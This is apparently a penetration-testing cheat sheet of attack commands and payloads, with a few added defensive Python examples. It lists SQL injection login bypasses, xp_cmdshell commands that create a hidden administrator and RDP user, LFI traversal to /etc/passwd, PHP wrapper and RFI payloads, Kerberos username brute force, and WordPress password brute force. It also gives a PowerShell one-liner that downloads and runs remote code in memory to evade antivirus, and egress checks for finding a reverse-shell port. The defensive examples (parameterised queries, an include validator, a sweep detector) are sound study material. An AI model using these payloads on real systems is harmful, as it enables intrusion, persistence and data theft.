Reconnaissance & enumeration
Enum, enum, enom, enomm, nom nomm!

Bash log

Log all commands and their output:
script target.log

Port scanning

Nmap

nmap -A -sS -Pn -n x.x.x.x
Scan all UDP ports without retries:
nmap -sU -p- --max-retries 0 --min-rate 500 x.x.x.x

Nc

nc -nvv -w 1 -z x.x.x.x 1-100
This nc command is also useful for checking egress filtering (see below).

PowerShell (in memory -> AV evasion)

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1');Invoke-Portscan -Hosts x.x.x.x"

Host enum

nikto -h x.x.x.x
enum4linux x.x.x.x
python getArch.py -target x.x.x.x

DNS zone transfer

dig axfr domain.com @nameserver

Web fuzzing

Gobuster
gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 20
gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/quickhits.txt -t 20
gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 20 -x .txt,.php

Wfuzz
wfuzz -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 400,404,500 http://x.x.x.x/FUZZ
wfuzz -w /usr/share/seclists/Discovery/Web_Content/quickhits.txt --hc 400,404,500 http://x.x.x.x/FUZZ

Samba (SMB)

Do not underestimate this one ;)
smbclient -L x.x.x.x
nmap --script=smb-check-vulns.nse x.x.x.x
smbmount //x.x.x.x/share /mnt -o username=hodor,workgroup=hodor
mount -t cifs //x.x.x.x/share /mnt
mount -t cifs -o username=hodor,password=hodor //x.x.x.x/share /mnt
smbclient \\\\x.x.x.x\\share
Anonymous bind using rpcclient:
rpcclient -U "" x.x.x.x

SNMP

Scan using the default community string:
snmpwalk -c public -v1 x.x.x.x

Kerberos

Discover valid usernames by brute-force querying possible usernames against a Kerberos service (source: https://nmap.org/nsedoc/scripts/krb5-enum-users.html):
nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='domain.local',userdb=/usr/share/wordlists/SecLists/Usernames/top_shortlist.txt x.x.x.x

CMS

CMSmap

cmsmap.py https://x.x.x.x

WPscan

wpscan --url https://x.x.x.x
Brute-force login:
wpscan --url http://x.x.x.x --wordlist /usr/share/wordlists/SecLists/Passwords/best1050.txt --username admin --threads 10

SQL injection

Test for authentication bypass

1' or '1'='1
1' or '1'='1'
1' or '1'='1'--
' or 1=1 --
a' or 1=1 --
" or 1=1 --
a" or 1=1 --
' or 1=1 #
" or 1=1 #
or 1=1 --
' or 'x'='x
" or "x"="x
') or ('x'='x
") or ("x"="x
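As an added example (not part of the original cheat sheet), the following Python script shows why the payloads above work against string-built queries and how a parameterised query stops them. It uses a constructed in-memory SQLite database; SQLite's comment syntax is `--`, so the `#` variants from the list are left out.

```python
import sqlite3

def make_db():
    """Constructed in-memory database with one account. The password is
    stored in clear text only to keep the example short."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'correct horse battery staple')")
    return db

def login_vulnerable(db, username, password):
    """String concatenation: a quote in the input closes the literal and the
    rest of the payload rewrites the WHERE clause, so 'or 1=1' succeeds."""
    sql = (f"SELECT COUNT(*) FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return db.execute(sql).fetchone()[0] > 0

def login_safe(db, username, password):
    """Parameterised query: both values are bound as data, so the same
    payloads are compared as literal strings and never match a row."""
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone()[0] > 0

# Bypass payloads from the list above that are valid SQLite syntax
# (SQLite uses -- for comments; the '#' variants are MySQL-only).
PAYLOADS = ["1' or '1'='1", "1' or '1'='1'--", "' or 1=1 --",
            "a' or 1=1 --", "' or 'x'='x"]

def check_payloads(payloads=PAYLOADS, username="nobody"):
    """Return {payload: (vulnerable_login_ok, safe_login_ok)} for a
    username that does not exist, so any True means a bypass."""
    db = make_db()
    return {p: (login_vulnerable(db, username, p), login_safe(db, username, p))
            for p in payloads}

if __name__ == "__main__":
    for payload, (vuln, safe) in check_payloads().items():
        print(f"{payload!r:22} vulnerable={vuln} parameterised={safe}")
```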

Use time delays to find injectable parameter

';WAITFOR DELAY '0:0:5'--
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
+BENCHMARK(40000000,SHA1(1337))+
'%2Bbenchmark(3200,SHA1(1))%2B'
If the above works, try to enable xp_cmdshell (source: http://pentestmonkey.net/blog/resurecting-xp_cmdshell):
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
xp_cmdshell - test ping:
';exec master..xp_cmdshell 'ping -n 3 x.x.x.x'; --
xp_cmdshell - add admin user:
';exec master..xp_cmdshell 'net user hodor Qwerty123! /ADD && net localgroup administrators hodor /ADD'; --
xp_cmdshell - add admin user and add it to the RDP group:
';exec master..xp_cmdshell 'net user hodor Qwerty123! /ADD && net localgroup administrators hodor /ADD && net localgroup "Remote Desktop Users" hodor /ADD'; --

Local File Inclusion (LFI)

Basic checks

Linux
../../../../../../../../../../etc/passwd
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
../../../../../../../../../../etc/passwd%00
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%2500

Windows
../../../../../../../../../../boot.ini
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini
../../../../../../../../../../boot.ini%00
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%2500
../../../../../../../../../../windows/system32/drivers/etc/hosts
../../../../../../../../../../windows/system32/drivers/etc/hosts%00
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/system32/drivers/etc/hosts
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/system32/drivers/etc/hosts%2500

LFI Wrappers

expect://
http://x.x.x.x/blah?parameter=expect://whoami
data://
http://x.x.x.x/blah?parameter=data://text/plain;base64,PD8gcGhwaW5mbygpOyA/Pg==
# the base64 encoded payload is: <? phpinfo(); ?>
php://input
http://x.x.x.x/blah?parameter=php://input
# POST data (using Hackbar)
<? phpinfo(); ?>
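As an added example, not from the original page, here is a Python input check of the kind an application should apply before including a file: it rejects the traversal payloads from the "Basic checks" list and the wrapper payloads from the "LFI Wrappers" list above. BASE_DIR, resolve_include and the sample values are constructed for the example and assume a POSIX path layout.

```python
import os
from urllib.parse import unquote

# Hypothetical document root for the example: the application may only
# include files that live below this directory.
BASE_DIR = "/var/www/app/pages"

def resolve_include(param, base_dir=BASE_DIR):
    """Return the absolute file path to include, or None if the request
    parameter is rejected. Covers raw and URL-encoded '../' traversal
    (including the double-encoded %2500 null byte) and stream wrappers
    such as expect://, data:// and php://input."""
    # Decode twice so that "%2f" and "%2500" are judged as the bytes the
    # application would finally see, not as the encoded text.
    decoded = unquote(unquote(param))
    if "\x00" in decoded:
        return None        # null-byte truncation of the file name
    if ":" in decoded:
        return None        # stream wrappers (expect://, data://, php://) and drive letters
    if os.path.isabs(decoded):
        return None        # absolute paths are never included
    candidate = os.path.normpath(os.path.join(base_dir, decoded))
    # After normalisation the path must still start inside base_dir.
    if os.path.commonpath([base_dir, candidate]) != base_dir:
        return None        # '../' climbed out of the document root
    return candidate

def triage(params):
    """Map each candidate parameter to its decision, for a quick log review."""
    return {p: resolve_include(p) for p in params}

# Constructed inputs: the page's payloads plus two legitimate values.
SAMPLES = [
    "about.php",
    "docs/help.php",
    "../../../../../../../../../../etc/passwd",
    "..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd",
    "../../../../../../../../../../etc/passwd%00",
    "..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%2500",
    "..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/system32/drivers/etc/hosts",
    "expect://whoami",
    "data://text/plain;base64,PD8gcGhwaW5mbygpOyA/Pg==",
    "php://input",
]

if __name__ == "__main__":
    for p, decision in triage(SAMPLES).items():
        print(f"{'ALLOW' if decision else 'REJECT':6} {p}")
```

An allow-list of known page names is stricter still; the normalisation check above is the minimum that makes the listed payloads fail.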

LFI to RCE

Remote File Inclusion (RFI)

Example request (where "x.x.x.x" is your attacker's IP):
GET /supersecret/admin.php?path=http://x.x.x.x/phpinfo.php%00

Check for egress filtering

In other words: find an outgoing port for a reverse shell. First start tcpdump on your own box:
tcpdump -i eth0
Then run this on the target (where x.x.x.x is your attacking box):
nc -nvv -w 1 -z x.x.x.x 1-100
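From the defender's side, the sweep above leaves a distinctive trace: one internal host sending SYNs to many ports of one external host within about a second. The following Python script, an added example that is not part of the original page, detects that pattern in tcpdump -n output; the capture lines are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# tcpdump -n line for an IPv4 TCP SYN: "HH:MM:SS.usec IP src.sport > dst.dport: Flags [S], ..."
SYN_RE = re.compile(
    r"^(?P<ts>\d{2}:\d{2}:\d{2}\.\d{1,6}) IP "
    r"(?P<src>\d+\.\d+\.\d+\.\d+)\.(?P<sport>\d+) > "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)\.(?P<dport>\d+): Flags \[S\]"
)

def parse_syn(line):
    """Return (timestamp, src, dst, dport) for a SYN line, else None."""
    m = SYN_RE.match(line)
    if not m:
        return None
    return datetime.strptime(m["ts"], "%H:%M:%S.%f"), m["src"], m["dst"], int(m["dport"])

def find_port_sweeps(lines, min_ports=20, window=timedelta(seconds=5)):
    """Flag (src, dst) pairs whose SYNs hit at least min_ports distinct
    destination ports inside a sliding window (the trace of 'nc -z x.x.x.x 1-100')."""
    events = defaultdict(list)                    # (src, dst) -> [(ts, dport)]
    for line in lines:
        parsed = parse_syn(line)
        if parsed:
            ts, src, dst, dport = parsed
            events[(src, dst)].append((ts, dport))
    alerts = {}
    for pair, hits in events.items():
        hits.sort()
        start = 0
        for end in range(len(hits)):
            while hits[end][0] - hits[start][0] > window:
                start += 1                        # slide the window forward
            ports = {p for _, p in hits[start:end + 1]}
            if len(ports) >= min_ports:
                alerts[pair] = max(len(ports), alerts.get(pair, 0))
    return alerts

# Constructed capture: 10.0.0.5 sweeps ports 1-100 of 203.0.113.7 within one
# second, while 10.0.0.9 makes two ordinary connections (and gets a SYN-ACK back).
SAMPLE = [
    f"10:00:00.{i * 9000:06d} IP 10.0.0.5.{41000 + i} > 203.0.113.7.{i}: Flags [S], seq 1, length 0"
    for i in range(1, 101)
] + [
    "10:00:00.500000 IP 10.0.0.9.51000 > 198.51.100.20.443: Flags [S], seq 1, length 0",
    "10:00:02.100000 IP 10.0.0.9.51001 > 198.51.100.20.80: Flags [S], seq 1, length 0",
    "10:00:02.100000 IP 198.51.100.20.80 > 10.0.0.9.51001: Flags [S.], seq 1, length 0",
]
```

Calling find_port_sweeps(SAMPLE) reports only the 10.0.0.5 to 203.0.113.7 pair, with 100 distinct ports; the two-port host stays below the threshold.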

Files and file systems

Unmounted file systems:
cat /etc/fstab
World-writable directories:
find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root
World-writable files:
find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null
Writable config files:
find /etc/ -writable -type f 2>/dev/null
